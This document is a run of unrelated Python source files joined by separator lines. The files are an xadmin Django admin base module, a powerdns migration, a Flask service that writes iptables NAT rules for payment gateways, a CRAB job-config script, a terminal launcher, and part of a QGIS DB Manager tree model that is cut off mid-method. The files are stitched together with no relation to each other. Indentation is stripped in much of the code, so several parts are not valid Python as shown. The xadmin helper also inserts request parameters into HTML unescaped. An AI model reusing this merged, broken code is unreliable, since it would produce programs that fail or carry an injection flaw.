import sys
import copy
import functools
import datetime
import decimal
from functools import update_wrapper
from inspect import getargspec
from django import forms
from django.utils.encoding import force_unicode
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.core.serializers.json import DjangoJSONEncoder
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.template import Context, Template
from django.template.response import TemplateResponse
from django.utils.datastructures import SortedDict
from django.utils.decorators import method_decorator, classonlymethod
from django.utils.encoding import smart_unicode
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic import View
from xadmin.util import static, json, vendor, sortkeypicker
csrf_protect_m = method_decorator(csrf_protect)
class IncorrectPluginArg(Exception):
pass
def filter_chain(filters, token, func, *args, **kwargs):
if token == -1:
return func()
else:
def _inner_method():
fm = filters[token]
fargs = getargspec(fm)[0]
if len(fargs) == 1:
# Only self arg
result = func()
if result is None:
return fm()
else:
                    raise IncorrectPluginArg(u'Plugin filter method needs an argument to receive the parent method result.')
else:
return fm(func if fargs[1] == '__' else func(), *args, **kwargs)
return filter_chain(filters, token - 1, _inner_method, *args, **kwargs)
def filter_hook(func):
tag = func.__name__
func.__doc__ = "``filter_hook``\n\n" + (func.__doc__ or "")
@functools.wraps(func)
def method(self, *args, **kwargs):
def _inner_method():
return func(self, *args, **kwargs)
if self.plugins:
filters = [(getattr(getattr(p, tag), 'priority', 10), getattr(p, tag))
for p in self.plugins if callable(getattr(p, tag, None))]
filters = [f for p, f in sorted(filters, key=lambda x:x[0])]
return filter_chain(filters, len(filters) - 1, _inner_method, *args, **kwargs)
else:
return _inner_method()
return method
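# Illustrative sketch (not part of the original source): how a plugin method
# participates in a ``filter_hook`` chain. ``DemoPlugin`` and ``DemoView`` are
# hypothetical names; they only assume the classes defined further below in
# this module.
#
#     class DemoPlugin(BaseAdminPlugin):
#         def get_context(self, context):
#             # Because the first plugin argument is not named ``__``, the
#             # plugin receives the parent method's result and may modify it.
#             context['demo'] = True
#             return context
#
#     class DemoView(CommAdminView):
#         plugin_classes = [DemoPlugin]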
def inclusion_tag(file_name, context_class=Context, takes_context=False):
def wrap(func):
@functools.wraps(func)
def method(self, context, nodes, *arg, **kwargs):
_dict = func(self, context, nodes, *arg, **kwargs)
from django.template.loader import get_template, select_template
if isinstance(file_name, Template):
t = file_name
elif not isinstance(file_name, basestring) and is_iterable(file_name):
t = select_template(file_name)
else:
t = get_template(file_name)
new_context = context_class(_dict, **{
'autoescape': context.autoescape,
'current_app': context.current_app,
'use_l10n': context.use_l10n,
'use_tz': context.use_tz,
})
new_context['admin_view'] = context['admin_view']
csrf_token = context.get('csrf_token', None)
if csrf_token is not None:
new_context['csrf_token'] = csrf_token
nodes.append(t.render(new_context))
return method
return wrap
class JSONEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, datetime.date):
return o.strftime('%Y-%m-%d')
elif isinstance(o, datetime.datetime):
return o.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(o, decimal.Decimal):
return str(o)
else:
try:
return super(JSONEncoder, self).default(o)
except Exception:
return smart_unicode(o)
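# Usage sketch for the encoder above (hypothetical values, not part of the
# original source):
#
#     json.dumps({'day': datetime.date(2015, 1, 31),
#                 'price': decimal.Decimal('9.90')},
#                cls=JSONEncoder, ensure_ascii=False)
#     # -> '{"day": "2015-01-31", "price": "9.90"}'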
class BaseAdminObject(object):
def get_view(self, view_class, option_class=None, *args, **kwargs):
opts = kwargs.pop('opts', {})
return self.admin_site.get_view_class(view_class, option_class, **opts)(self.request, *args, **kwargs)
def get_model_view(self, view_class, model, *args, **kwargs):
return self.get_view(view_class, self.admin_site._registry.get(model), *args, **kwargs)
def get_admin_url(self, name, *args, **kwargs):
return reverse('%s:%s' % (self.admin_site.app_name, name), args=args, kwargs=kwargs)
def get_model_url(self, model, name, *args, **kwargs):
return reverse(
'%s:%s_%s_%s' % (self.admin_site.app_name, model._meta.app_label,
model._meta.module_name, name),
args=args, kwargs=kwargs, current_app=self.admin_site.name)
def get_model_perm(self, model, name):
return '%s.%s_%s' % (model._meta.app_label, name, model._meta.module_name)
def has_model_perm(self, model, name, user=None):
user = user or self.user
return user.has_perm(self.get_model_perm(model, name)) or (name == 'view' and self.has_model_perm(model, 'change', user))
def get_query_string(self, new_params=None, remove=None):
if new_params is None:
new_params = {}
if remove is None:
remove = []
p = dict(self.request.GET.items()).copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(p)
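    # Example (hypothetical request, not part of the original source): with
    # ``?p=2&o=name`` in request.GET, ``self.get_query_string({'p': 3}, ['o'])``
    # removes every parameter starting with ``o``, overrides ``p`` and
    # returns ``'?p=3'``.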
def get_form_params(self, new_params=None, remove=None):
if new_params is None:
new_params = {}
if remove is None:
remove = []
p = dict(self.request.GET.items()).copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return mark_safe(''.join(
'<input type="hidden" name="%s" value="%s"/>' % (k, v) for k, v in p.items() if v))
def render_response(self, content, response_type='json'):
if response_type == 'json':
response = HttpResponse(mimetype="application/json; charset=UTF-8")
response.write(
json.dumps(content, cls=JSONEncoder, ensure_ascii=False))
return response
return HttpResponse(content)
def template_response(self, template, context):
return TemplateResponse(self.request, template, context, current_app=self.admin_site.name)
def message_user(self, message, level='info'):
"""
Send a message to the user. The default implementation
posts a message using the django.contrib.messages backend.
"""
if hasattr(messages, level) and callable(getattr(messages, level)):
getattr(messages, level)(self.request, message)
def static(self, path):
return static(path)
def vendor(self, *tags):
return vendor(*tags)
class BaseAdminPlugin(BaseAdminObject):
def __init__(self, admin_view):
self.admin_view = admin_view
self.admin_site = admin_view.admin_site
if hasattr(admin_view, 'model'):
self.model = admin_view.model
self.opts = admin_view.model._meta
def init_request(self, *args, **kwargs):
pass
class BaseAdminView(BaseAdminObject, View):
""" Base Admin view, support some comm attrs."""
base_template = 'xadmin/base.html'
need_site_permission = True
def __init__(self, request, *args, **kwargs):
self.request = request
self.request_method = request.method.lower()
self.user = request.user
self.base_plugins = [p(self) for p in getattr(self,
"plugin_classes", [])]
self.args = args
self.kwargs = kwargs
self.init_plugin(*args, **kwargs)
self.init_request(*args, **kwargs)
@classonlymethod
def as_view(cls):
def view(request, *args, **kwargs):
self = cls(request, *args, **kwargs)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
if self.request_method in self.http_method_names:
handler = getattr(
self, self.request_method, self.http_method_not_allowed)
else:
handler = self.http_method_not_allowed
return handler(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
view.need_site_permission = cls.need_site_permission
return view
def init_request(self, *args, **kwargs):
pass
def init_plugin(self, *args, **kwargs):
plugins = []
for p in self.base_plugins:
p.request = self.request
p.user = self.user
p.args = self.args
p.kwargs = self.kwargs
result = p.init_request(*args, **kwargs)
if result is not False:
plugins.append(p)
self.plugins = plugins
@filter_hook
def get_context(self):
return {'admin_view': self, 'media': self.media, 'base_template': self.base_template}
@property
def media(self):
return self.get_media()
@filter_hook
def get_media(self):
return forms.Media()
class CommAdminView(BaseAdminView):
base_template = 'xadmin/base_site.html'
menu_template = 'xadmin/includes/sitemenu_default.html'
site_title = None
global_models_icon = {}
default_model_icon = None
apps_label_title = {}
apps_icons = {}
apps_label_order = {}
def get_site_menu(self):
return None
@filter_hook
def get_nav_menu(self):
site_menu = list(self.get_site_menu() or [])
had_urls = []
def get_url(menu, had_urls):
if 'url' in menu:
had_urls.append(menu['url'])
if 'menus' in menu:
for m in menu['menus']:
get_url(m, had_urls)
get_url({'menus': site_menu}, had_urls)
nav_menu = SortedDict()
for model, model_admin in self.admin_site._registry.items():
if getattr(model_admin, 'hidden_menu', False):
continue
app_label = model._meta.app_label
app_icon = None
model_dict = {
'title': unicode(capfirst(model._meta.verbose_name_plural)),
'url': self.get_model_url(model, "changelist"),
'icon': self.get_model_icon(model),
'perm': self.get_model_perm(model, 'view'),
'order': model_admin.order,
}
if model_dict['url'] in had_urls:
continue
app_key = "app:%s" % app_label
if app_key in nav_menu:
nav_menu[app_key]['menus'].append(model_dict)
else:
# Find app title
app_title = unicode(app_label.title())
if app_label.lower() in self.apps_label_title:
app_title = self.apps_label_title[app_label.lower()]
else:
mods = model.__module__.split('.')
if len(mods) > 1:
mod = '.'.join(mods[0:-1])
if mod in sys.modules:
mod = sys.modules[mod]
if 'verbose_name' in dir(mod):
app_title = getattr(mod, 'verbose_name')
elif 'app_title' in dir(mod):
app_title = getattr(mod, 'app_title')
                # Find app icon
if app_label.lower() in self.apps_icons:
app_icon = self.apps_icons[app_label.lower()]
                # Find app order
app_order = None
if app_label in self.apps_label_order:
app_order = self.apps_label_order[app_label]
nav_menu[app_key] = {
'title': app_title,
'menus': [model_dict],
'order': app_order
}
app_menu = nav_menu[app_key]
if app_icon:
app_menu['first_icon'] = app_icon
elif ('first_icon' not in app_menu or
app_menu['first_icon'] == self.default_model_icon) and model_dict.get('icon'):
app_menu['first_icon'] = model_dict['icon']
if 'first_url' not in app_menu and model_dict.get('url'):
app_menu['first_url'] = model_dict['url']
for menu in nav_menu.values():
menu['menus'].sort(key=sortkeypicker(['order', 'title']))
nav_menu = nav_menu.values()
nav_menu.sort(key=lambda x: (x['order'], x['title']))
site_menu.extend(nav_menu)
return site_menu
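    # Shape of one app entry produced by ``get_nav_menu`` above (illustrative
    # values only, not part of the original source):
    #
    #     {'title': u'Blog', 'order': None,
    #      'first_icon': 'fa fa-file', 'first_url': '/admin/blog/post/',
    #      'menus': [{'title': u'Posts', 'url': '/admin/blog/post/',
    #                 'icon': 'fa fa-file', 'perm': 'blog.view_post',
    #                 'order': 0}]}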
@filter_hook
def get_context(self):
context = super(CommAdminView, self).get_context()
if not settings.DEBUG and 'nav_menu' in self.request.session:
nav_menu = json.loads(self.request.session['nav_menu'])
else:
menus = copy.copy(self.get_nav_menu())
def check_menu_permission(item):
need_perm = item.pop('perm', None)
if need_perm is None:
return True
elif callable(need_perm):
return need_perm(self.user)
elif need_perm == 'super':
return self.user.is_superuser
else:
return self.user.has_perm(need_perm)
def filter_item(item):
if 'menus' in item:
before_filter_length = len(item['menus'])
item['menus'] = [filter_item(
i) for i in item['menus'] if check_menu_permission(i)]
after_filter_length = len(item['menus'])
                    # if the user has no access to any of the submenus, remove this menu item
if after_filter_length == 0 and before_filter_length > 0:
return None
return item
nav_menu = [filter_item(item) for item in menus if check_menu_permission(item)]
nav_menu = filter(lambda x:x, nav_menu)
if not settings.DEBUG:
self.request.session['nav_menu'] = json.dumps(nav_menu)
self.request.session.modified = True
def check_selected(menu, path):
selected = False
if 'url' in menu:
chop_index = menu['url'].find('?')
if chop_index == -1:
selected = path.startswith(menu['url'])
else:
selected = path.startswith(menu['url'][:chop_index])
if 'menus' in menu:
for m in menu['menus']:
_s = check_selected(m, path)
if _s:
selected = True
if selected:
menu['selected'] = True
return selected
for menu in nav_menu:
check_selected(menu, self.request.path)
context.update({
'menu_template': self.menu_template,
'nav_menu': nav_menu,
'site_title': self.site_title or _(u'Django Xadmin'),
'breadcrumbs': self.get_breadcrumb()
})
return context
@filter_hook
def get_model_icon(self, model):
icon = self.global_models_icon.get(model)
if icon is None and model in self.admin_site._registry:
icon = getattr(self.admin_site._registry[model],
'model_icon', self.default_model_icon)
return icon
@filter_hook
def get_breadcrumb(self):
return [{
'url': self.get_admin_url('index'),
'title': _('Home')
}]
class ModelAdminView(CommAdminView):
fields = None
exclude = None
ordering = None
model = None
remove_permissions = []
def __init__(self, request, *args, **kwargs):
self.opts = self.model._meta
self.app_label = self.model._meta.app_label
self.module_name = self.model._meta.module_name
self.model_info = (self.app_label, self.module_name)
super(ModelAdminView, self).__init__(request, *args, **kwargs)
@filter_hook
def get_context(self):
new_context = {
"opts": self.opts,
"app_label": self.app_label,
"module_name": self.module_name,
"verbose_name": force_unicode(self.opts.verbose_name),
'model_icon': self.get_model_icon(self.model),
}
context = super(ModelAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_breadcrumb(self):
bcs = super(ModelAdminView, self).get_breadcrumb()
item = {'title': self.opts.verbose_name_plural}
if self.has_view_permission():
item['url'] = self.model_admin_url('changelist')
bcs.append(item)
return bcs
@filter_hook
def get_object(self, object_id):
"""
        Get the model instance identified by object_id; used by the change admin view.
"""
        # first get the base admin view queryset; by default this is the model's default queryset
queryset = self.queryset()
model = queryset.model
try:
object_id = model._meta.pk.to_python(object_id)
return queryset.get(pk=object_id)
except (model.DoesNotExist, ValidationError):
return None
@filter_hook
def get_object_url(self, obj):
if self.has_change_permission(obj):
return self.model_admin_url("change", getattr(obj, self.opts.pk.attname))
elif self.has_view_permission(obj):
return self.model_admin_url("detail", getattr(obj, self.opts.pk.attname))
else:
return None
def model_admin_url(self, name, *args, **kwargs):
return reverse(
"%s:%s_%s_%s" % (self.admin_site.app_name, self.opts.app_label,
self.module_name, name), args=args, kwargs=kwargs)
def get_model_perms(self):
"""
        Returns a dict of all perms for this model. This dict has the keys
        ``view``, ``add``, ``change``, and ``delete`` mapping to True/False
        for each of those actions.
"""
return {
'view': self.has_view_permission(),
'add': self.has_add_permission(),
'change': self.has_change_permission(),
'delete': self.has_delete_permission(),
}
def get_template_list(self, template_name):
opts = self.opts
return (
"xadmin/%s/%s/%s" % (
opts.app_label, opts.object_name.lower(), template_name),
"xadmin/%s/%s" % (opts.app_label, template_name),
"xadmin/%s" % template_name,
)
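    # Example (hypothetical model, not part of the original source): for a
    # model ``blog.Post``, ``get_template_list('change_form.html')`` yields
    # the search order
    #     "xadmin/blog/post/change_form.html"
    #     "xadmin/blog/change_form.html"
    #     "xadmin/change_form.html"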
def get_ordering(self):
"""
Hook for specifying field ordering.
"""
return self.ordering or () # otherwise we might try to *None, which is bad ;)
def queryset(self):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
return self.model._default_manager.get_query_set()
def has_view_permission(self, obj=None):
return ('view' not in self.remove_permissions) and (self.user.has_perm('%s.view_%s' % self.model_info) or \
self.user.has_perm('%s.change_%s' % self.model_info))
def has_add_permission(self):
return ('add' not in self.remove_permissions) and self.user.has_perm('%s.add_%s' % self.model_info)
def has_change_permission(self, obj=None):
return ('change' not in self.remove_permissions) and self.user.has_perm('%s.change_%s' % self.model_info)
def has_delete_permission(self, obj=None):
return ('delete' not in self.remove_permissions) and self.user.has_perm('%s.delete_%s' % self.model_info)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import django.core.validators
import powerdns.models.powerdns
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('powerdns', '0010_auto_20150921_0613'),
]
operations = [
migrations.CreateModel(
name='Authorisation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('target_id', models.PositiveIntegerField()),
('authorised', models.ForeignKey(related_name='received_authorisations', to=settings.AUTH_USER_MODEL)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('owner', models.ForeignKey(related_name='issued_authorisations', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AlterField(
model_name='domain',
name='name',
field=models.CharField(verbose_name='name', unique=True, max_length=255, validators=[django.core.validators.RegexValidator('^(\\*\\.)?([_A-Za-z0-9-]+\\.)*([A-Za-z0-9])+$'), powerdns.models.powerdns.SubDomainValidator()]),
),
]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
PGW
~~~~~~
Payment gateways VNF with RESTful API.
:copyright: (c) 2015 by Anton K. Komarov.
:license: MIT, see LICENSE for more details.
"""
import os
import sqlite3
from flask import Flask, g, abort, jsonify
from flask.ext.restful import Api, Resource, reqparse, fields, marshal
from contextlib import closing
import iptc
import dns.resolver
pgw_fields = {
'domain': fields.String,
'uri': fields.Url('pgw',absolute=True)
}
app = Flask(__name__)
app.config.from_object(__name__)
api = Api(app)
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'pgw.db'),
INTF_IN='eth1',
PORTAL_IP='127.0.0.1:80',
DEBUG=True,
))
app.config.from_envvar('PGW_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database."""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def init_db():
"""Initializes the database."""
db = get_db()
with app.open_resource('schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
@app.cli.command('initdb')
def initdb_command():
"""Creates the database tables."""
init_db()
print('Initialized the database.')
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
def query_db(query, args=(), one=False):
"""A query function that combines getting the cursor,
executing and fetching the results.
"""
db=get_db()
cur = db.execute(query, args)
rv = cur.fetchall()
cur.close()
db.commit()
return (rv[0] if rv else None) if one else rv
def tbl_prep():
"""Prepare table NAT and two chains."""
tblf=iptc.Table(iptc.Table.NAT)
tblf.flush()
chain_pr = iptc.Chain(tblf, 'PREROUTING')
chain_pr.flush()
chain_pgw = tblf.create_chain('PAYMENT_GW')
rule = iptc.Rule()
rule.protocol='udp'
rule.create_target('ACCEPT')
m = rule.create_match('udp')
m.dport='53'
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.create_target('PAYMENT_GW')
rule.protocol='tcp'
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.protocol='tcp'
rule.in_interface=app.config['INTF_IN']
t = rule.create_target('DNAT')
t.to_destination=app.config['PORTAL_IP']
m = rule.create_match('tcp')
m.dport='80'
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.create_target('DROP')
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
return chain_pgw
def query_dns(host_list):
"""Get host ip mappings from DNS records."""
collection = {}
for host in host_list:
try:
res = dns.resolver.query(host['domain'],'A')
for a in res:
collection[a.address]=host['domain']
        except Exception:
            # skip hosts that fail to resolve
            pass
return collection
@app.route('/pgw/api/v1.0/pgws/reload')
def reload_pgw():
"""Reload iptables structure from scratch."""
pgws=query_db('select domain from pgws order by id')
chain_pgw=tbl_prep()
for pgw in pgws:
append_pgw(pgw[0])
return jsonify({'result': True}), 202
def append_pgw(pgw):
"""Append payment gw to iptables chain."""
chain_pgw = iptc.Chain(iptc.Table(iptc.Table.NAT),'PAYMENT_GW')
if not iptc.Table(iptc.Table.NAT).is_chain(chain_pgw):
tbl_prep()
collection=query_dns([{'domain':pgw},])
for ip,host in collection.items():
rule = iptc.Rule()
rule.create_target('ACCEPT')
m = rule.create_match('comment')
m.comment=str(host)
rule.dst=str(ip)
chain_pgw.append_rule(rule)
return len(collection)
def delete_pgw(pgw):
""" Delete payment gw from iptables chain."""
table = iptc.Table(iptc.Table.NAT)
table.autocommit = False
chain_pgw = iptc.Chain(table,'PAYMENT_GW')
if not iptc.Table(iptc.Table.NAT).is_chain(chain_pgw):
tbl_prep()
return
for r in chain_pgw.rules:
for m in r.matches:
if 'comment' in m.parameters:
if m.parameters['comment']==pgw:
chain_pgw.delete_rule(r)
table.commit()
table.refresh()
table.autocommit = True
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
class PgwListAPI(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('domain', type=str, required=True,
help='No domain provided',
location='json')
super(PgwListAPI, self).__init__()
def get(self):
pgws=query_db('select id, domain from pgws order by id desc')
return {'pgws': [marshal(pgw, pgw_fields) for pgw in pgws]}
def post(self):
args = self.reqparse.parse_args()
pgws=query_db('select id, domain from pgws where domain=?', [args['domain'],])
if len(pgws)==0:
if (append_pgw(args['domain'])>0):
query_db('insert into pgws (domain) values (?)', [args['domain'],])
pgws = query_db('select id, domain from pgws order by id desc')
return {'pgws': [marshal(pgw, pgw_fields) for pgw in pgws]}, 201
else:
return {'result': False}, 406
class PgwAPI(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('domain', type=str, location='json')
super(PgwAPI, self).__init__()
def get(self, id):
pgw = query_db('select id, domain from pgws where id=?', [id,])
if len(pgw) == 0:
abort(404)
return {'pgw': marshal(pgw[0], pgw_fields)}
def delete(self, id):
pgw=query_db('select domain from pgws where id=?', [id,])
delete_pgw(str(pgw[0][0]))
query_db('delete from pgws where id=?', [id,])
return {'result': True}
api.add_resource(PgwListAPI, '/pgw/api/v1.0/pgws', endpoint='pgws')
api.add_resource(PgwAPI, '/pgw/api/v1.0/pgws/<int:id>', endpoint='pgw')
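# Example interaction with the API defined above (hypothetical host and
# domain, not part of the original source); assumes the ``requests`` package:
#
#     import requests
#     base = 'http://localhost:5000/pgw/api/v1.0/pgws'
#     requests.post(base, json={'domain': 'pay.example.com'})  # register a gateway
#     requests.get(base).json()                                # list gateways
#     requests.delete(base + '/1')                             # remove by id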
if __name__ == '__main__':
app.run()
|
#!/bin/env python
#*******************************************************************************
#
# Filename : 01_run_baseline_selection.py
# Description : Submitting all designated datasets to crab
# Author : Yi-Mu "Enoch" Chen [ [email protected] ]
#
#*******************************************************************************
import TstarAnalysis.RunSequence.Naming as myname
import TstarAnalysis.RunSequence.Settings as mysetting
import TstarAnalysis.RunSequence.PathVars as mypath
import sys, os
import optparse
#-------------------------------------------------------------------------------
# Defining global variables
#-------------------------------------------------------------------------------
config_file_default = """
from CRABClient.UserUtilities import config
config = config()
config.General.requestName = '{0}'
config.General.workArea = '{1}'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = '{2}'
config.JobType.maxMemoryMB = 2500
## Input parameters
config.JobType.pyCfgParams = [
'Mode={3}',
'GlobalTag={4}',
]
{5}
config.Data.inputDataset = '{6}'
config.Data.inputDBS = 'global'
config.Data.splitting = '{7}'
config.Data.unitsPerJob = {8}
config.Data.outLFNDirBase = '{9}'
config.Data.publication = False
config.Site.storageSite = '{10}'
"""
#-------------------------------------------------------------------------------
# Main control flows
#-------------------------------------------------------------------------------
def MakeCrabFile( dataset, opt ):
# Preparing variables
task_name = myname.GetTaskName( 'tstar' , dataset , opt.mode )
work_area = mysetting.crab_work_dir
run_file = mysetting.cmsrun_dir + 'run_baseline_selection.py'
mode = opt.mode
global_tag = myname.GetGlobalTag( dataset )
splittype = ""
lumimask = ""
splitunit = 0
hlt = myname.GetHLT(dataset)
lfn_dir = mysetting.crab_default_path
site = mysetting.crab_site
if myname.IsData( dataset ):
splittype = 'LumiBased'
splitunit = 480 * 60 # target time in seconds
splitunit = splitunit / 0.033 # real time per event
splitunit = splitunit / 4000 # average number of events in lumi
else:
splittype = 'LumiBased'
splitunit = 480 * 2 * 60 # target time in seconds
splitunit = splitunit / 0.033 # real time per event
splitunit = splitunit / 200 # average number of events in lumi
file_content = config_file_default.format(
task_name , #{0}
work_area , #{1}
run_file , #{2}
mode , #{3}
global_tag , #{4}
lumimask , #{5}
dataset , #{6}
splittype , #{7}
int(splitunit) , #{8}
lfn_dir , #{9}
site , #{10}
)
## Writing to Crab file
crab_config_file = myname.GetCrabFile('tstar',dataset,opt.mode)
my_file = open( crab_config_file , 'w' )
my_file.write( file_content )
my_file.close()
return crab_config_file
def main():
parser = optparse.OptionParser()
parser.add_option('-i', '--inputlist', dest='input', help='list of data sets to generate', default=None, type='string')
parser.add_option('-m', '--mode', dest='mode', help='which mode to run with', default=None, type='string')
(opt,args) = parser.parse_args()
if not opt.input or not opt.mode:
print "Error! [input] nad [mode] inputs are obligatory!"
parser.print_help()
return
with open(opt.input) as f:
dataset_list = f.readlines()
for dataset in dataset_list :
dataset = dataset.strip()
crab_file = MakeCrabFile( dataset, opt )
print "Written config to", crab_file
if __name__ == "__main__":
sys.exit(main())
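# Example invocation (hypothetical file name and mode, not part of the
# original source); each line of the input list is expected to hold one
# dataset path:
#
#     python 01_run_baseline_selection.py -i dataset_list.txt -m MuonSignal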
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import sys
if sys.platform == 'win32':
from ._win import launch_powershell, launch_cmd, launch_executable
elif sys.platform == 'darwin':
from ._osx import launch_terminal_app, launch_iterm_app
from ._posix import launch_executable
else:
from ._linux import get_default_terminal
from ._posix import launch_executable
from ._types import verify_unicode, verify_unicode_list, verify_unicode_dict
__version__ = '1.0.0'
__version_info__ = (1, 0, 0)
def launch_terminal(cwd, env=None, terminal=None, args=None, width=1024, use_tabs=False):
"""
Launches a terminal at the directory specified
:param cwd:
A unicode string of the working directory to open the terminal to
:param env:
A dict of unicode strings for a custom environmental variables to set
:param terminal:
A unicode string of the name of the terminal to execute. If None, uses
the OS default. Special OS X values include: "Terminal.app" and
"iTerm.app". Special Windows values include: "powershell.exe" and
"cmd.exe". All others are launched as a subprocess and must pick up the
cwd and env from the Python subprocess module.
:param args:
A list of unicode strings of the arguments to pass to the terminal
executable. Ignored when terminal is set to any of:
- "Terminal.app"
- "iTerm.app",
- "cmd.exe"
- "powershell.exe"
:param width:
Windows only: an integer of the width of the terminal window when
terminal is None, "powershell.exe" or "cmd.exe"
    :param use_tabs:
OS X only: a boolean if tabs should be used instead of new windows when
terminal is None, "Terminal.app" or "iTerm.app"
"""
verify_unicode(cwd, 'cwd')
verify_unicode_dict(env, 'env')
verify_unicode(terminal, 'terminal', allow_none=True)
verify_unicode_list(args, 'args', allow_none=True)
if sys.platform == 'darwin':
if terminal is None or terminal == 'Terminal.app':
launch_terminal_app(cwd, env=env, use_tabs=use_tabs)
elif terminal == 'iTerm.app':
launch_iterm_app(cwd, env=env, use_tabs=use_tabs)
else:
launch_executable(terminal, args, cwd, env=env)
elif sys.platform == 'win32':
if terminal is None or terminal == 'powershell.exe':
launch_powershell(cwd, env=env, width=width)
elif terminal == 'cmd.exe':
launch_cmd(cwd, env=env, width=width)
else:
launch_executable(terminal, args, cwd, env=env)
else:
if terminal is None:
terminal = get_default_terminal()
launch_executable(terminal, args, cwd, env=env)
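# Usage sketch (hypothetical paths and values, not part of the original
# source):
#
#     launch_terminal(u'/home/user/project', env={u'DEBUG': u'1'})
#     launch_terminal(u'/home/user/project', terminal=u'xterm',
#                     args=[u'-fa', u'Monospace'])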
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import range
from functools import partial
from qgis.PyQt.QtCore import Qt, QObject, qDebug, QByteArray, QMimeData, QDataStream, QIODevice, QFileInfo, QAbstractItemModel, QModelIndex, pyqtSignal
from qgis.PyQt.QtWidgets import QApplication, QMessageBox
from qgis.PyQt.QtGui import QIcon
from .db_plugins import supportedDbTypes, createDbPlugin
from .db_plugins.plugin import BaseError, Table, Database
from .dlg_db_error import DlgDbError
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsRasterLayer, QgsMimeDataUtils
from qgis.utils import OverrideCursor
from . import resources_rc # NOQA
try:
from qgis.core import QgsVectorLayerExporter # NOQA
isImportVectorAvail = True
except ImportError:
    isImportVectorAvail = False
class TreeItem(QObject):
deleted = pyqtSignal()
changed = pyqtSignal()
def __init__(self, data, parent=None):
QObject.__init__(self, parent)
self.populated = False
self.itemData = data
self.childItems = []
if parent:
parent.appendChild(self)
def childRemoved(self):
self.itemChanged()
def itemChanged(self):
self.changed.emit()
def itemDeleted(self):
self.deleted.emit()
def populate(self):
self.populated = True
return True
def getItemData(self):
return self.itemData
def appendChild(self, child):
self.childItems.append(child)
child.deleted.connect(self.childRemoved)
def child(self, row):
return self.childItems[row]
def removeChild(self, row):
if row >= 0 and row < len(self.childItems):
self.childItems[row].itemData.deleteLater()
self.childItems[row].deleted.disconnect(self.childRemoved)
del self.childItems[row]
def childCount(self):
return len(self.childItems)
def columnCount(self):
return 1
def row(self):
if self.parent():
for row, item in enumerate(self.parent().childItems):
if item is self:
return row
return 0
def data(self, column):
return "" if column == 0 else None
def icon(self):
return None
def path(self):
pathList = []
if self.parent():
pathList.extend(self.parent().path())
pathList.append(self.data(0))
return pathList
class PluginItem(TreeItem):
def __init__(self, dbplugin, parent=None):
TreeItem.__init__(self, dbplugin, parent)
def populate(self):
if self.populated:
return True
# create items for connections
for c in self.getItemData().connections():
ConnectionItem(c, self)
self.populated = True
return True
def data(self, column):
if column == 0:
return self.getItemData().typeNameString()
return None
def icon(self):
return self.getItemData().icon()
def path(self):
return [self.getItemData().typeName()]
class ConnectionItem(TreeItem):
def __init__(self, connection, parent=None):
TreeItem.__init__(self, connection, parent)
connection.changed.connect(self.itemChanged)
connection.deleted.connect(self.itemDeleted)
# load (shared) icon with first instance of table item
if not hasattr(ConnectionItem, 'connectedIcon'):
ConnectionItem.connectedIcon = QIcon(":/db_manager/icons/plugged.png")
ConnectionItem.disconnectedIcon = QIcon(":/db_manager/icons/unplugged.png")
def data(self, column):
if column == 0:
return self.getItemData().connectionName()
return None
def populate(self):
if self.populated:
return True
connection = self.getItemData()
if connection.database() is None:
# connect to database
try:
if not connection.connect():
return False
except BaseError as e:
DlgDbError.showError(e, None)
return False
database = connection.database()
database.changed.connect(self.itemChanged)
